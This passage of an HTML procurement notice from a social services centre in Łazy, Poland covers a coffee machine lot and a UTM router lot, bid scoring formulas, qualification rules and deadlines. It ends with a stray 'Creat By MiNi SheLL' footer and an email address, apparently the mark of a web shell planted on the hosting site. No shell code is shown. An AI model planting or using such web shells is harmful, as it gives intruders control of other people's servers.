+ T<br/>gdzie:<br/>Lp –liczba punktów uzyskanych przez ofertę,<br/>C –liczba punktów uzyskanych w kryterium „cena”,<br/>T –liczba punktów uzyskanych w kryterium „Termin realizacji zamówienia ”.<br/><br/>5.Najkorzystniejsza oferta to oferta, która przedstawia najkorzystniejszy bilans ceny i innych kryteriów, czyli oferta, która uzyska najwyższą sumaryczną liczbę punktów (liczoną do dwóch miejsc po przecinku).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie nr 2 - Dostawa Ekspresu do kawy.<br/>2. Adres dostawy: Centrum Usług Społecznych w Łazach, 42-450 Łazy ul. Pocztowa 14;<br/> 3. Dostarczone wyposażenie musi być fabrycznie nowe, wolne od wad, wykonane w bezpiecznych technologiach. Musi<br/> spełniać wymagania norm UE, a produkty, które tego wymagają muszą posiadać aktualne certyfikaty bezpieczeństwa,<br/> atesty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem.<br/> 4. W przypadku mebli i wyposażenia wymagającego wniesienia, montażu, złożenia, podłączenia i/lub instalacji, Wykonawca<br/> zobowiązany jest dokonać wniesienia, montażu/złożenia/skręcenia w miejscu uzgodnionym z Zamawiającym. Zamawiający<br/> informuje o ewentualnym doliczeniu do ceny opłat w ofercie za wniesienie, montaż, złożenie, podłączenie itd. przedmiotu<br/> dostawy do pomieszczeń CUS. Wykonawca zobowiązany jest również do posprzątania pomieszczenia po montażu mebli<br/> oraz zabrania opakowań w których dostarczono meble i wyposażenie. <br/>5. Po dostarczeniu wszystkich elementów wyposażenia oraz po zakończeniu montażu, Wykonawca zobowiązany jest do<br/> uporządkowania terenu dostaw i miejsca montażu oraz zabranie opakowań. Wszelkie zniszczenia powstałe podczas i w<br/> wyniku montażu będą usuwane przez Wykonawcę na własny koszt i własnym staraniem. <br/>6. Wykonawca będzie mógł przystąpić do montażu i instalacji wyposażenia po weryfikacji przez Zamawiającego spełniania<br/> przez poszczególne elementy wyposażenia parametrów określonych w dokumentach zamówienia i ich akceptacji przez<br/> Zamawiającego.<br/> 7. Najpóźniej z dniem dostawy Wykonawca dostarczy Zamawiającemu karty gwarancyjne w formie papierowej w języku<br/> polskim. <br/>8. Szczegółowy opis oraz sposób realizacji przedmiotu zamówienia został określony w opisie przedmiotu zamówienia, który<br/> stanowi załącznik nr 5 do SWZ oraz we wzorze umowy, który stanowi załącznik nr 4 do SWZ. <br/>9. Wskazane w dokumentach znaki towarowe, nazwy własne, itp. – stanowią wyłącznie wzorzec jakościowy, funkcjonalny,<br/> techniczny i technologiczny dotyczący przedmiotu zamówienia. We wszystkich przypadkach, w których ze względu na<br/> specyfikację pochodzenie, dopuszcza się stosowanie materiałów, urządzeń równoważnych, tj. wszelkie wymienione z<br/> nazwy materiały, urządzenia użyte w przekazanej przez Zamawiającego dokumentacji lub ich pochodzenie, służą wyłącznie<br/> określeniu standardu i mogą być zastąpione innymi o nie gorszych parametrach technicznych, użytkowych, jakościowych,<br/> funkcjonalnych i walorach estetycznych, przy uwzględnieniu prawidłowej współpracy z pozostałymi materiałami,<br/> urządzeniami. Użyte w dokumentacji zamówienia nazwy, które wskazują lub mogłyby kojarzyć się z producentem lub firmą,<br/> nie mają na celu preferowanie rozwiązań danego producenta lecz wskazanie na rozwiązanie, które powinno posiadać cechy<br/> techniczne, technologiczne nie gorsze od podanych w dokumentacji technicznej. Zamawiający w przypadku ofert<br/> zawierających rozwiązania równoważne będzie je weryfikować pod względem spełniania wymogów poszczególnych pozycji<br/> wymagań technicznych zawartych w załącznikach do Specyfikacji. Wykonawca zobowiązany jest udowodnić w ofercie<br/> równoważność oferowanych urządzeń lub systemów. Ciężar udowodnienia równoważności jest obowiązkiem Wykonawcy.<br/> Zamawiający nie uzna rozwiązań równoważnych, jeśli będą o gorszych niż wskazane w załącznikach do Specyfikacji<br/> minimalnych wymaganiach jakościowych, funkcjonalnych, technicznych i technologicznych.<br/> 10. Zamieszczone w dokumentacji zamówienia wymienione nazwy producentów (jeśli takie się pojawią) użyto jedynie w<br/> celu przykładowym. Ewentualnie wskazane nazwy produktów oraz ich producentów nie mają na celu naruszenie zasady<br/> uczciwej konkurencji i równego traktowania wykonawców. Wszędzie gdzie są one wskazane, należy czytać w ten sposób,<br/> że towarzyszy im określenie „lub równoważne”. Przez pojęcie „lub równoważne” Zamawiający rozumie oferowanie<br/> materiałów gwarantujących realizację zadania zapewniających uzyskanie parametrów technicznych nie gorszych od<br/> założonych w wyżej wymienionych dokumentach. Zastosowanie rozwiązań równoważnych nie może prowadzić do<br/> pogorszenia właściwości przedmiotu zamówienia w stosunku do przewidzianych w dokumentacji technicznej, ani do zmiany<br/> ceny, ani do naruszenia przepisów prawa.<br/> 11. W przypadku spełnienia powyższych warunków Zamawiający dopuszcza stosowanie rozwiązań równoważnych. Jeżeli<br/> Wykonawca zaoferuje rozwiązania równoważne, musi wykazać w ofercie, że proponowany przez niego przedmiot<br/> zamówienia spełnia wymagania określone przez Zamawiającego. <br/>12. Ilekroć niniejsza specyfikacja opisuje przedmiot zamówienia za pomocą norm, ocen technicznych, specyfikacji<br/> technicznych i systemów referencji technicznych, Zamawiający dopuszcza rozwiązania równoważne opisywanym.<br/> Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, udowodni w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104–107 ustawy Pzp, że<br/> proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39711310-5 - Elektryczne zaparzacze do kawy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z przepisami ustawy Prawo zamówień publicznych. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia. Jeżeli Zamawiający nie będzie mógł wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną.<br/><br/>2.Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>ZADANIE NR 1, 2, 3<br/>2.1.Kryterium „cena” – wskaźnik C, ranga –60.<br/><br/>Wskaźnik C obliczany jest wg wzoru:<br/>C = (C m / C b) x 100 pkt x 60<br/>gdzie:<br/>C m –najniższa cena oferty,<br/>C b –cena oferty badanej<br/>(wynik działania zostanie zaokrąglony do 2 miejsc po przecinku) <br/>	Maksymalna liczba punktów jaką można uzyskać – 60 <br/><br/>2.2.Kryterium „Termin realizacji zamówienia ” wskaźnik T, ranga – 40.<br/><br/>będzie rozpatrywane na podstawie zadeklarowanego przez wykonawcę w formularzu ofertowym okresu terminu realizacji zamówienia na dostawę przedmiotu zamówienia w tygodniach, zgodnie z poniższymi zasadami: <br/>do 7 dni– 0 pkt <br/>do 5 dni– 20 pkt<br/>do 3 dni – 40 pkt <br/><br/>Maksymalna liczba punktów jaką można uzyskać – 40<br/><br/>UWAGA! <br/>a 1. Termin realizacji zamówienia wskazany w formularzu ofertowym liczony będzie od momentu zawarcia umowy. <br/>b 2. termin realizacji zamówienia nie może być dłuższy niż 7 dni. <br/>3. Ocena kryterium nastąpi na podstawie oświadczenia złożonego przez Wykonawcę w Formularzu oferty – załącznik nr 1 do SWZ.<br/><br/>4.Końcowa ocena oferty to suma punktów uzyskanych za poszczególne kryteria wg wzoru:<br/>Lp = C + T<br/>gdzie:<br/>Lp –liczba punktów uzyskanych przez ofertę,<br/>C –liczba punktów uzyskanych w kryterium „cena”,<br/>T –liczba punktów uzyskanych w kryterium „Termin realizacji zamówienia ”.<br/><br/>5.Najkorzystniejsza oferta to oferta, która przedstawia najkorzystniejszy bilans ceny i innych kryteriów, czyli oferta, która uzyska najwyższą sumaryczną liczbę punktów (liczoną do dwóch miejsc po przecinku).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zadanie nr 3- Router UTM wraz z wdrożeniem i szkoleniem<br/>2. Adres dostawy: Centrum Usług Społecznych w Łazach, 42-450 Łazy ul. Pocztowa 14;<br/> 3. Dostarczone wyposażenie musi być fabrycznie nowe, wolne od wad, wykonane w bezpiecznych technologiach. Musi<br/> spełniać wymagania norm UE, a produkty, które tego wymagają muszą posiadać aktualne certyfikaty bezpieczeństwa,<br/> atesty, świadectwa jakości i spełniać wszelkie wymogi norm określonych obowiązującym prawem.<br/> 4. W przypadku mebli i wyposażenia wymagającego wniesienia, montażu, złożenia, podłączenia i/lub instalacji, Wykonawca<br/> zobowiązany jest dokonać wniesienia, montażu/złożenia/skręcenia w miejscu uzgodnionym z Zamawiającym. Zamawiający<br/> informuje o ewentualnym doliczeniu do ceny opłat w ofercie za wniesienie, montaż, złożenie, podłączenie itd. przedmiotu<br/> dostawy do pomieszczeń CUS. Wykonawca zobowiązany jest również do posprzątania pomieszczenia po montażu mebli<br/> oraz zabrania opakowań w których dostarczono meble i wyposażenie. <br/>5. Po dostarczeniu wszystkich elementów wyposażenia oraz po zakończeniu montażu, Wykonawca zobowiązany jest do<br/> uporządkowania terenu dostaw i miejsca montażu oraz zabranie opakowań. Wszelkie zniszczenia powstałe podczas i w<br/> wyniku montażu będą usuwane przez Wykonawcę na własny koszt i własnym staraniem. <br/>6. Wykonawca będzie mógł przystąpić do montażu i instalacji wyposażenia po weryfikacji przez Zamawiającego spełniania<br/> przez poszczególne elementy wyposażenia parametrów określonych w dokumentach zamówienia i ich akceptacji przez<br/> Zamawiającego.<br/> 7. Najpóźniej z dniem dostawy Wykonawca dostarczy Zamawiającemu karty gwarancyjne w formie papierowej w języku<br/> polskim. <br/>8. Szczegółowy opis oraz sposób realizacji przedmiotu zamówienia został określony w opisie przedmiotu zamówienia, który<br/> stanowi załącznik nr 5 do SWZ oraz we wzorze umowy, który stanowi załącznik nr 4 do SWZ. <br/>9. Wskazane w dokumentach znaki towarowe, nazwy własne, itp. – stanowią wyłącznie wzorzec jakościowy, funkcjonalny,<br/> techniczny i technologiczny dotyczący przedmiotu zamówienia. We wszystkich przypadkach, w których ze względu na<br/> specyfikację pochodzenie, dopuszcza się stosowanie materiałów, urządzeń równoważnych, tj. wszelkie wymienione z<br/> nazwy materiały, urządzenia użyte w przekazanej przez Zamawiającego dokumentacji lub ich pochodzenie, służą wyłącznie<br/> określeniu standardu i mogą być zastąpione innymi o nie gorszych parametrach technicznych, użytkowych, jakościowych,<br/> funkcjonalnych i walorach estetycznych, przy uwzględnieniu prawidłowej współpracy z pozostałymi materiałami,<br/> urządzeniami. Użyte w dokumentacji zamówienia nazwy, które wskazują lub mogłyby kojarzyć się z producentem lub firmą,<br/> nie mają na celu preferowanie rozwiązań danego producenta lecz wskazanie na rozwiązanie, które powinno posiadać cechy<br/> techniczne, technologiczne nie gorsze od podanych w dokumentacji technicznej. Zamawiający w przypadku ofert<br/> zawierających rozwiązania równoważne będzie je weryfikować pod względem spełniania wymogów poszczególnych pozycji<br/> wymagań technicznych zawartych w załącznikach do Specyfikacji. Wykonawca zobowiązany jest udowodnić w ofercie<br/> równoważność oferowanych urządzeń lub systemów. Ciężar udowodnienia równoważności jest obowiązkiem Wykonawcy.<br/> Zamawiający nie uzna rozwiązań równoważnych, jeśli będą o gorszych niż wskazane w załącznikach do Specyfikacji<br/> minimalnych wymaganiach jakościowych, funkcjonalnych, technicznych i technologicznych.<br/> 10. Zamieszczone w dokumentacji zamówienia wymienione nazwy producentów (jeśli takie się pojawią) użyto jedynie w<br/> celu przykładowym. Ewentualnie wskazane nazwy produktów oraz ich producentów nie mają na celu naruszenie zasady<br/> uczciwej konkurencji i równego traktowania wykonawców. Wszędzie gdzie są one wskazane, należy czytać w ten sposób,<br/> że towarzyszy im określenie „lub równoważne”. Przez pojęcie „lub równoważne” Zamawiający rozumie oferowanie<br/> materiałów gwarantujących realizację zadania zapewniających uzyskanie parametrów technicznych nie gorszych od<br/> założonych w wyżej wymienionych dokumentach. Zastosowanie rozwiązań równoważnych nie może prowadzić do<br/> pogorszenia właściwości przedmiotu zamówienia w stosunku do przewidzianych w dokumentacji technicznej, ani do zmiany<br/> ceny, ani do naruszenia przepisów prawa.<br/> 11. W przypadku spełnienia powyższych warunków Zamawiający dopuszcza stosowanie rozwiązań równoważnych. Jeżeli<br/> Wykonawca zaoferuje rozwiązania równoważne, musi wykazać w ofercie, że proponowany przez niego przedmiot<br/> zamówienia spełnia wymagania określone przez Zamawiającego. <br/>12. Ilekroć niniejsza specyfikacja opisuje przedmiot zamówienia za pomocą norm, ocen technicznych, specyfikacji<br/> technicznych i systemów referencji technicznych, Zamawiający dopuszcza rozwiązania równoważne opisywanym.<br/> Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, udowodni w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 104–107 ustawy Pzp, że<br/> proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32420000-3 - Urządzenia sieciowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamówienie udzielone będzie wyłącznie Wykonawcy wybranemu zgodnie z przepisami ustawy Prawo zamówień publicznych. Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w Specyfikacji Warunków Zamówienia. Jeżeli Zamawiający nie będzie mógł wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną.<br/><br/>2.Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/><br/>ZADANIE NR 1, 2, 3<br/>2.1.Kryterium „cena” – wskaźnik C, ranga –60.<br/><br/>Wskaźnik C obliczany jest wg wzoru:<br/>C = (C m / C b) x 100 pkt x 60<br/>gdzie:<br/>C m –najniższa cena oferty,<br/>C b –cena oferty badanej<br/>(wynik działania zostanie zaokrąglony do 2 miejsc po przecinku) <br/>	Maksymalna liczba punktów jaką można uzyskać – 60 <br/><br/>2.2.Kryterium „Termin realizacji zamówienia ” wskaźnik T, ranga – 40.<br/><br/>będzie rozpatrywane na podstawie zadeklarowanego przez wykonawcę w formularzu ofertowym okresu terminu realizacji zamówienia na dostawę przedmiotu zamówienia w tygodniach, zgodnie z poniższymi zasadami: <br/>do 7 dni– 0 pkt <br/>do 5 dni– 20 pkt<br/>do 3 dni – 40 pkt <br/><br/>Maksymalna liczba punktów jaką można uzyskać – 40<br/><br/>UWAGA! <br/>a 1. Termin realizacji zamówienia wskazany w formularzu ofertowym liczony będzie od momentu zawarcia umowy. <br/>b 2. termin realizacji zamówienia nie może być dłuższy niż 7 dni. <br/>3. Ocena kryterium nastąpi na podstawie oświadczenia złożonego przez Wykonawcę w Formularzu oferty – załącznik nr 1 do SWZ.<br/><br/>4.Końcowa ocena oferty to suma punktów uzyskanych za poszczególne kryteria wg wzoru:<br/>Lp = C + T<br/>gdzie:<br/>Lp –liczba punktów uzyskanych przez ofertę,<br/>C –liczba punktów uzyskanych w kryterium „cena”,<br/>T –liczba punktów uzyskanych w kryterium „Termin realizacji zamówienia ”.<br/><br/>5.Najkorzystniejsza oferta to oferta, która przedstawia najkorzystniejszy bilans ceny i innych kryteriów, czyli oferta, która uzyska najwyższą sumaryczną liczbę punktów (liczoną do dwóch miejsc po przecinku).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie<br/> wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/> wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających: brak podstaw<br/> wykluczenia:<br/> 3.1.oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/> rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/> wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/> informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej,<br/> zgodnie ze wzorem stanowiącym załącznik nr 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający odstępuje od wezwania wykonawcy, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie,<br/> nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych<br/> potwierdzających: spełnianie warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu będzie<br/> dokonana na podstawie Oświadczenia o spełnianiu warunków – zgodnego z załącznikiem nr 2 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawcy zobowiązani są wraz z ofertą złożyć następujące oświadczenia i dokumenty:<br/> 1.1.„Formularz Oferty” przygotowany zgodnie ze wzorem podanym w Załączniku nr 1 SWZ, zgodnie z załączonym wzorem.<br/> 1.2.Oświadczenie/oświadczenia Wykonawcy/Wykonawców wspólnie ubiegających się o udzielenie zamówienia/podmiotów<br/> udostępniających zasoby o niepodleganiu wykluczeniu - wypełnione zgodnie z Załącznikiem nr 2 do SWZ.<br/> 1.3. Formularz cenowy – uzupełniony odpowiednio do zadań, na które jest składana oferta<br/> 1.4. Pełnomocnictwo / Pełnomocnictwa dla osoby / osób podpisujących ofertę, jeżeli oferta jest podpisana przez<br/> pełnomocnika (o ile upoważnienie to nie wynika z innych dokumentów dołączonych do oferty).Pełnomocnictwo do złożenia<br/> oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (t.j. w formie elektronicznej lub postaci<br/> elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii<br/> (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia<br/> sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. -Prawo o notariacie, które to poświadczenie<br/> notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa<br/> sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym<br/> mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/> 1.5.W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum),<br/> do oferty powinno zostać załączone pełnomocnictwo dla Osoby Uprawnionej do reprezentowania ich w postępowaniu albo<br/> do reprezentowania ich w postępowaniu i zawarcia umowy.<br/> 1.6.Zobowiązania innych podmiotów do udostępnienia zasobów, jeśli Wykonawca korzysta z zasobów innych podmiotów.<br/> 1.7.Oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny skuteczności zastrzeżenia informacji<br/> zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa ,w rozumieniu przepisów o zwalczaniu nieuczciwej<br/> konkurencji (jeżeli Wykonawca zastrzega takie informacje) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta podmiotów występujących wspólnie:<br/> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w formie spółki cywilnej, konsorcjum, porozumienia zawartego między podmiotami, itp).<br/> 2) Zamawiający nie zastrzega obowiązku osobistego wykonania kluczowych zadań przez poszczególnych Wykonawców<br/> wspólnie ubiegających się o udzielenie zamówienia.<br/> 3) Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/> zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy<br/> spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty<br/> umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/> 4) Pełnomocnictwo należy dołączyć do oferty. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.<br/> Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem (Zamawiającym).<br/> 5) Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie<br/> żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.<br/> 6) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o których mowa w pkt 1 ppkt 3)<br/> (wg załącznika 2 do SWZ) składa odrębnie każdy z Wykonawców. Oświadczenia te mają potwierdzać brak podstaw<br/> wykluczenia w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/> określonych we Wzorze umowy, stanowiącym załącznik nr 4 do SWZ.<br/> 2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/> 3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/> uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze umowy, stanowiącym załącznik nr 4 do SWZ.<br/> 4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-4cef2ce2-13dd-493f-9c43-e594a24392f1</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-12 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2026-01-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com